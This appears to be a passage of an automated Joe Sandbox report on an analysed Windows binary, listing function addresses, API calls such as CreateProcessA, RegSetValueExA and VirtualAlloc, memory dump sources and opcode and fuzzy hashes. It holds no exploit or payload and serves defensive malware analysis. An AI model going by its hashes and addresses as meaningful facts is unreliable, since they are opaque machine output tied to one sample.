                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$Data$AccessBoundUnaccess$Elemsize
                                                                • String ID:
                                                                • API String ID: 3535882829-0
                                                                • Opcode ID: 5b48fcd4ae437c339932c4fb1ea066e9bc054e8f04fc0b2f354a155db00d7b46
                                                                • Instruction ID: 853b402a566193894561e6386f2e38829b47c6b346f4e9e453f6705d66a4d6ad
                                                                • Opcode Fuzzy Hash: 5b48fcd4ae437c339932c4fb1ea066e9bc054e8f04fc0b2f354a155db00d7b46
                                                                • Instruction Fuzzy Hash: EF41A1366042149FC704DF15EC84AABBBA5FBC8310F48852EFD498B311D734E94ACB96
                                                                Function 004CE500 Relevance: 10.7, APIs: 7, Instructions: 185memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayAllocDescriptor.OLEAUT32(00000001,?), ref: 004CE625
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 004CE64D
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004CE661
                                                                • SafeArrayDestroy.OLEAUT32(?), ref: 004CE670
                                                                • SysAllocString.OLEAUT32(00000000), ref: 004CE6A9
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004CE720
                                                                • VariantClear.OLEAUT32(?), ref: 004CE72B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$AllocData$AccessClearDescriptorDestroyStringUnaccessVariant
                                                                • String ID:
                                                                • API String ID: 959405800-0
                                                                • Opcode ID: 5620cda6693a4cd40d520bf80e32b317f16263d67d42ca3a774dc92ed3f3f63c
                                                                • Instruction ID: b29e7a64f478f06af6ebfe4fad5933cf2c75ab083553736dc1894009af8ef3a0
                                                                • Opcode Fuzzy Hash: 5620cda6693a4cd40d520bf80e32b317f16263d67d42ca3a774dc92ed3f3f63c
                                                                • Instruction Fuzzy Hash: B951AE7A7183019BD7608E06D980B2B73D5EB98314F64482FE946CB351D33EDD468B5B
                                                                Function 0042A990 Relevance: 10.7, APIs: 7, Instructions: 182memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayAllocDescriptor.OLEAUT32(00000001,?), ref: 0042AAB5
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0042AADD
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0042AAF1
                                                                • SafeArrayDestroy.OLEAUT32(?), ref: 0042AB00
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0042AB33
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0042ABA5
                                                                • VariantClear.OLEAUT32(?), ref: 0042ABB0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$AllocData$AccessClearDescriptorDestroyStringUnaccessVariant
                                                                • String ID:
                                                                • API String ID: 959405800-0
                                                                • Opcode ID: a49a1d726510079caa05acaf699350e751fd496200b3ee7d4788bad4ade4fac2
                                                                • Instruction ID: e78877611a345a0c5f73117d671949b20e4f1872f582fe53a19fe75ebe15ad10
                                                                • Opcode Fuzzy Hash: a49a1d726510079caa05acaf699350e751fd496200b3ee7d4788bad4ade4fac2
                                                                • Instruction Fuzzy Hash: 9351F272B082218BE710CE14E98071B77E1AF84324F69486FEE4997311D23DEC56CB9B
                                                                Function 004CECA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStartupInfoA.KERNEL32 ref: 004CECB2
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 004CED31
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004CED4A
                                                                • CloseHandle.KERNEL32(?), ref: 004CED5B
                                                                • CloseHandle.KERNEL32(?), ref: 004CED62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateInfoObjectProcessSingleStartupWait
                                                                • String ID: D
                                                                • API String ID: 2246201701-2746444292
                                                                • Opcode ID: fe1a3573c42138bac607bd3eb089348872ec80b81e4302a9449e6ed191fffd85
                                                                • Instruction ID: cc9a0b81f8c0b867509816d9d375112040518371b90dc173ad09a6dce363b280
                                                                • Opcode Fuzzy Hash: fe1a3573c42138bac607bd3eb089348872ec80b81e4302a9449e6ed191fffd85
                                                                • Instruction Fuzzy Hash: FB212C791083429AC2609F1AD888E5BFBF8EFC5750F20491EF59687260D77A8845CB5B
                                                                Function 0057A66C Relevance: 9.0, APIs: 6, Instructions: 45COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                • String ID:
                                                                • API String ID: 1054593271-0
                                                                • Opcode ID: 60c5b3fca5f5bac3aae129150b2fdfc5d3be58b8f59e10879edba38688657a32
                                                                • Instruction ID: 1edbefccd68bde30e960696bd3cabf138c108c42805edc2f0a8df0bd02c60973
                                                                • Opcode Fuzzy Hash: 60c5b3fca5f5bac3aae129150b2fdfc5d3be58b8f59e10879edba38688657a32
                                                                • Instruction Fuzzy Hash: 0CF0F6329086235EEA34B7743C0AA4E3EA5FFC1770B248919F15DD44D6FF10884175A6
                                                                Function 004DE34F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetVersionExA.KERNEL32 ref: 004DE36E
                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004DE3A3
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004DE403
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                • API String ID: 1385375860-4131005785
                                                                • Opcode ID: cc94ea33216fdd3aff6ac6d955d1faaf8f57de1e112c2f7230c6063767097712
                                                                • Instruction ID: cef5c9b14e2de636c60a8ae8c030bf57d95cc0fe6db48a2401f7106ef9ecde00
                                                                • Opcode Fuzzy Hash: cc94ea33216fdd3aff6ac6d955d1faaf8f57de1e112c2f7230c6063767097712
                                                                • Instruction Fuzzy Hash: 62312871D412986DEB31A673ACA5AEE3B689B07304F1400EBD544DE342E63C9E858B1A
                                                                Function 004D2858 Relevance: 7.8, APIs: 5, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5dc778c64f6de0db0be82290c6c299521fe3b1aedc022d2e920f3016c560bdf0
                                                                • Instruction ID: c1668ba74bdc07974cf5b4c00d4d5ab858563be957b33d1c781798d26120dbf4
                                                                • Opcode Fuzzy Hash: 5dc778c64f6de0db0be82290c6c299521fe3b1aedc022d2e920f3016c560bdf0
                                                                • Instruction Fuzzy Hash: EF913771D01614ABCF21EF69CE61A9FBB79EB25360F240217F814B6390D7B99D408B6C
                                                                Function 004DCB17 Relevance: 7.8, APIs: 5, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6f96b4867547eb495983309ee8bc42e1c7503212f6f367234a3b45f0263f92a
                                                                • Instruction ID: 0e086c023c6ce614a2e90a42fa5feeb076bdd450aedcd419c883f8f51f948de3
                                                                • Opcode Fuzzy Hash: f6f96b4867547eb495983309ee8bc42e1c7503212f6f367234a3b45f0263f92a
                                                                • Instruction Fuzzy Hash: 65910AB1D00119AACF21AB69DDD5A9F7B79EB04760F200127F818B6391D7399D40C7AC
                                                                Function 004DE098 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStartupInfoA.KERNEL32(?), ref: 004DE0F6
                                                                • GetFileType.KERNEL32(?,?,00000000), ref: 004DE1A1
                                                                • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004DE204
                                                                • GetFileType.KERNEL32(00000000,?,00000000), ref: 004DE212
                                                                • SetHandleCount.KERNEL32 ref: 004DE249
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileHandleType$CountInfoStartup
                                                                • String ID:
                                                                • API String ID: 1710529072-0
                                                                • Opcode ID: 8be64a4e14b26ab6f5cc16c6261ed22f21b150ba6e1a81cb6c7991c01e031e85
                                                                • Instruction ID: 80e3a03d2af8ed9a5d13cc1b7fe0f18f2e6d06260f53e93f4570b596bf54836f
                                                                • Opcode Fuzzy Hash: 8be64a4e14b26ab6f5cc16c6261ed22f21b150ba6e1a81cb6c7991c01e031e85
                                                                • Instruction Fuzzy Hash: 425146716042019BD720EB6AC8A462A77E5BB02328F24476FD492CF3E1DB38D846C74A
                                                                Function 0042E2B0 Relevance: 7.6, APIs: 5, Instructions: 150registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ftol.LIBCMT ref: 0042E35A
                                                                • __ftol.LIBCMT ref: 0042E372
                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000,?,?,?,?,000006A4,?,00000000), ref: 0042E42A
                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004,?,?,?,?,000006A4,?,00000000,80000004,00000000,00000000), ref: 0042E443
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,000006A4,?,00000000,80000004,00000000,00000000,80000004), ref: 0042E45A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __ftol$CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 2774032030-0
                                                                • Opcode ID: 87cef7bdf47f57844543b11e1872aa1cd693e77235bc976354781164402979ae
                                                                • Instruction ID: 023e2582569022385e886f6fbaf22cce4985febc8027c66a114747ce3ab55f10
                                                                • Opcode Fuzzy Hash: 87cef7bdf47f57844543b11e1872aa1cd693e77235bc976354781164402979ae
                                                                • Instruction Fuzzy Hash: 5541F1706083119BE320DE26D884B2FBBE4EB88314F64891EFE8987351D67DDC44CB5A
                                                                Function 004D49F6 Relevance: 7.6, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00002020,00692A84), ref: 004D4A17
                                                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?), ref: 004D4A3B
                                                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?), ref: 004D4A55
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?,?), ref: 004D4B16
                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?,?,?), ref: 004D4B2D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$AllocFreeHeap$Allocate
                                                                • String ID:
                                                                • API String ID: 3000792370-0
                                                                • Opcode ID: fdcd8e763578ab4e9278f0eb4f736382df18b48c16c83bebfdb83decbc657f7d
                                                                • Instruction ID: e534bc740f4057d285d30c8cea4ccff9950536162273f407702a0596159ba493
                                                                • Opcode Fuzzy Hash: fdcd8e763578ab4e9278f0eb4f736382df18b48c16c83bebfdb83decbc657f7d
                                                                • Instruction Fuzzy Hash: 4D31FE72640743AFD7308F24DC94B22BBA9EB94764F10453BE1559BBA0E778A8449B4C
                                                                Function 0042C320 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042C33A
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042C364
                                                                • TranslateMessage.USER32(?), ref: 0042C36B
                                                                • DispatchMessageA.USER32(?), ref: 0042C372
                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042C381
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Peek$DispatchTranslate
                                                                • String ID:
                                                                • API String ID: 1795658109-0
                                                                • Opcode ID: 0dcd50b2512ad1a183fead95d241eb94f51a31e238268db8a767ce7fe212b49f
                                                                • Instruction ID: d9ab7b62dd65e864912b5ec78e33b241f16a149a380d57bf7563b4d3650381fd
                                                                • Opcode Fuzzy Hash: 0dcd50b2512ad1a183fead95d241eb94f51a31e238268db8a767ce7fe212b49f
                                                                • Instruction Fuzzy Hash: D401A47278434576E230DB64AC82F6B775CEB84B50F944969FB00AA1C1D674F908C7AE
                                                                Function 004CC470 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004CC48A
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CC4B4
                                                                • TranslateMessage.USER32(?), ref: 004CC4BB
                                                                • DispatchMessageA.USER32(?), ref: 004CC4C2
                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CC4D1
                                                                Memory Dump Source
